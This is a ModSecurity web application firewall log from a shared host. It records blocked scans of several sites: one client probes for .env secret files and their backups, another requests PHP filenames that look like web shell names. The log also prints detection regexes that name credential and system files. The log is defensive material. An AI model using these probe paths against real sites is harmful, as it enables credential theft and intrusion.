[Tue May 26 14:01:35.412957 2026] [security2:error] [pid 578581:tid 578791] [client 4.193.189.92:1421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/as.php"] [unique_id "ahVaZ5m_8al1sb-umPtlJwAAAFA"]
[Tue May 26 14:01:36.160110 2026] [security2:error] [pid 578581:tid 578770] [client 4.193.189.92:6494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/aa.php"] [unique_id "ahVaaJm_8al1sb-umPtlQQAAADs"]
[Tue May 26 14:01:36.887925 2026] [security2:error] [pid 578581:tid 578752] [client 4.193.189.92:6514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/abc.php"] [unique_id "ahVaaJm_8al1sb-umPtlYAAAACk"]
[Tue May 26 14:01:36.951394 2026] [security2:error] [pid 578581:tid 578812] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaaJm_8al1sb-umPtlTQAAAGU"]
[Tue May 26 14:01:37.368538 2026] [security2:error] [pid 578581:tid 578799] [client 129.222.147.134:14911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaaZm_8al1sb-umPtlbgAAAFg"]
[Tue May 26 14:01:37.368657 2026] [security2:error] [pid 578581:tid 578799] [client 129.222.147.134:14911] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaaZm_8al1sb-umPtlbgAAAFg"]
[Tue May 26 14:01:37.597302 2026] [security2:error] [pid 578581:tid 578792] [client 4.193.189.92:3130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/av.php"] [unique_id "ahVaaZm_8al1sb-umPtlcgAAAFE"]
[Tue May 26 14:01:38.394049 2026] [security2:error] [pid 578581:tid 578754] [client 4.193.189.92:1441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/autoload_classmap.php"] [unique_id "ahVaapm_8al1sb-umPtlggAAACs"]
[Tue May 26 14:01:38.836930 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaapm_8al1sb-umPtlhwAAAGg"]
[Tue May 26 14:01:39.121130 2026] [security2:error] [pid 578581:tid 578813] [client 4.193.189.92:6283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/asus.php"] [unique_id "ahVaa5m_8al1sb-umPtlmgAAAGY"]
[Tue May 26 14:01:39.835809 2026] [security2:error] [pid 578581:tid 578792] [client 4.193.189.92:2176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/about.php"] [unique_id "ahVaa5m_8al1sb-umPtlrQAAAFE"]
[Tue May 26 14:01:40.036282 2026] [security2:error] [pid 578581:tid 578679] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env"] [unique_id "ahVabJm_8al1sb-umPtltAAAEGE"]
[Tue May 26 14:01:40.044701 2026] [security2:error] [pid 578581:tid 578582] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.blog.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVabJm_8al1sb-umPtluQAAEAA"]
[Tue May 26 14:01:40.181462 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtltgAAEGI"]
[Tue May 26 14:01:40.183927 2026] [security2:error] [pid 578581:tid 578693] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVabJm_8al1sb-umPtlzAAAEG8"]
[Tue May 26 14:01:40.187012 2026] [security2:error] [pid 578581:tid 578584] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVabJm_8al1sb-umPtlzwAAEAI"]
[Tue May 26 14:01:40.219578 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlswAAEF8"]
[Tue May 26 14:01:40.221823 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtluAAAEGU"]
[Tue May 26 14:01:40.222915 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtluwAAEAA"]
[Tue May 26 14:01:40.224922 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtltwAAEGM"]
[Tue May 26 14:01:40.315851 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlyQAAEAE"]
[Tue May 26 14:01:40.323603 2026] [security2:error] [pid 578581:tid 578680] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlxwAAEGI"]
[Tue May 26 14:01:40.324582 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlyAAAEGk"]
[Tue May 26 14:01:40.325819 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlzgAAEG8"]
[Tue May 26 14:01:40.327479 2026] [security2:error] [pid 578581:tid 578585] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVabJm_8al1sb-umPtl0QAAEAM"]
[Tue May 26 14:01:40.330760 2026] [security2:error] [pid 578581:tid 578594] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env"] [unique_id "ahVabJm_8al1sb-umPtl0wAAEAw"]
[Tue May 26 14:01:40.336117 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl0AAAEAU"]
[Tue May 26 14:01:40.337934 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlygAAEGo"]
[Tue May 26 14:01:40.368051 2026] [security2:error] [pid 578581:tid 578595] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVabJm_8al1sb-umPtl2AAAEA0"]
[Tue May 26 14:01:40.369297 2026] [security2:error] [pid 578581:tid 578597] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVabJm_8al1sb-umPtl2QAAEA8"]
[Tue May 26 14:01:40.455438 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl0gAAEAQ"]
[Tue May 26 14:01:40.460118 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1gAAEA4"]
[Tue May 26 14:01:40.463277 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1AAAEAo"]
[Tue May 26 14:01:40.464570 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1QAAEHA"]
[Tue May 26 14:01:40.489816 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1wAAEAs"]
[Tue May 26 14:01:40.499732 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl2gAAEAg"]
[Tue May 26 14:01:40.518364 2026] [security2:error] [pid 578581:tid 578696] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVabJm_8al1sb-umPtl6gAAEHI"]
[Tue May 26 14:01:40.542776 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlvQAAAG4"]
[Tue May 26 14:01:40.592330 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl3gAAEBA"]
[Tue May 26 14:01:40.595063 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4QAAEBQ"]
[Tue May 26 14:01:40.597855 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl3wAAEBE"]
[Tue May 26 14:01:40.603904 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4AAAEBI"]
[Tue May 26 14:01:40.625720 2026] [security2:error] [pid 578581:tid 578752] [client 4.193.189.92:1356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/atomlib.php"] [unique_id "ahVabJm_8al1sb-umPtl9QAAACk"]
[Tue May 26 14:01:40.658304 2026] [security2:error] [pid 578581:tid 578605] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVabJm_8al1sb-umPtl8QAAEBc"]
[Tue May 26 14:01:40.738722 2026] [security2:error] [pid 578581:tid 578703] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVabJm_8al1sb-umPtl_AAAEHk"]
[Tue May 26 14:01:40.751124 2026] [security2:error] [pid 578581:tid 578610] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env~"] [unique_id "ahVabJm_8al1sb-umPtl_wAAEBw"]
[Tue May 26 14:01:41.278886 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl6QAAEBg"]
[Tue May 26 14:01:41.292713 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4wAAEBU"]
[Tue May 26 14:01:41.304654 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl5wAAEHE"]
[Tue May 26 14:01:41.316383 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl5QAAEBY"]
[Tue May 26 14:01:41.336953 2026] [security2:error] [pid 578581:tid 578781] [client 4.193.189.92:3129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/alfa-rex.php7"] [unique_id "ahVabZm_8al1sb-umPtmFAAAAEY"]
[Tue May 26 14:01:41.339079 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4gAAEBM"]
[Tue May 26 14:01:41.380713 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl8gAAEHY"]
[Tue May 26 14:01:41.389474 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl8wAAEBs"]
[Tue May 26 14:01:41.391500 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl9AAAEHU"]
[Tue May 26 14:01:41.394601 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl-AAAEHQ"]
[Tue May 26 14:01:41.406514 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl-wAAEBk"]
[Tue May 26 14:01:41.407157 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl9gAAEHM"]
[Tue May 26 14:01:41.414374 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtmAwAAEHo"]
[Tue May 26 14:01:41.415204 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtmBAAAEHs"]
[Tue May 26 14:01:41.422879 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl_gAAEHc"]
[Tue May 26 14:01:41.427279 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl_QAAEHg"]
[Tue May 26 14:01:41.438214 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtmBQAAEHw"]
